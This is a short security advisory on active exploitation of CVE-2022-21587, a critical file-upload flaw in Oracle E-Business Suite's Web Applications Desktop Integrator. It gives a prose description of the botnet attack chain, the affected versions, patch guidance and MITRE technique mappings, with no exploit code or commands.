Get in Touch
Exploitation of critical vulnerability in Oracle E-Business Suite
Indiscriminate, opportunistic targeting.
Severity Level – Critical (CVSS v3 score of 9.8): Compromise may result in the loss of confidentiality and integrity of data.
Several compromises have been detected, pertaining to a vulnerability in the Oracle E-Business Suite (EBS). The vulnerability, tracked as CVE-2022-21587, relates to critical arbitrary file upload capabilities.
Oracle E-Business Suite is a packaged collection of enterprise applications utilised for a range of tasks such as customer relationship management (CRM), enterprise resource planning (ERP) and human capital management (HCM).
Successful exploitation of this vulnerability could result in threat actors, with network access via HTTP, hijacking the Oracle Web Applications Desktop Integrator (CVE-2022-21587, CVE-2022-39428), leading to a potential unauthenticated remote code execution.
Threat actors have been detected as having implemented a proof of concept exploit. This involves the upload of a Perl script, which fetches (via curl/wget) additional script components to download a malicious binary payload, leading to the victim host becoming an integrated part of a botnet.
Oracle has released the required security patch for the vulnerability for the respective product versions. As such, previous versions (detailed below) are vulnerable to potential exploit.
- Oracle Web Applications Desktop Integrator versions: 12.2.3 – 12.2.11
Containment, Mitigations & Remediations
Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply the relevant security patch as soon as possible. It is also advised that users monitor Oracle’s advisory for further details. The upgraded version is as follows:
– Oracle Web Applications Desktop Integrator version: 12.2.12
Indicators of Compromise
No specific Indicators of Compromise (IoC) are available at this time.
In terms of market share, the Oracle E-Business Suite is currently in the top tier of enterprise application providers. Threat actors generally utilise a combination of probability and asset value to determine which attack surfaces to develop exploits for. As a result, Oracle products have become a prime target for threat actors. Due to the fact that enterprise application suites have become an integral aspect of business affairs, threat actors will continue to exploit vulnerabilities contained within the associated products in an attempt to exfiltrate the sensitive data contained therein.
No attribution to specific threat actors/groups has been identified at the time of this writing.
T1210 – Exploitation of Remote Services
Command and Control:
T1105 – Ingress Tool Transfer
National Vulnerability Database Reference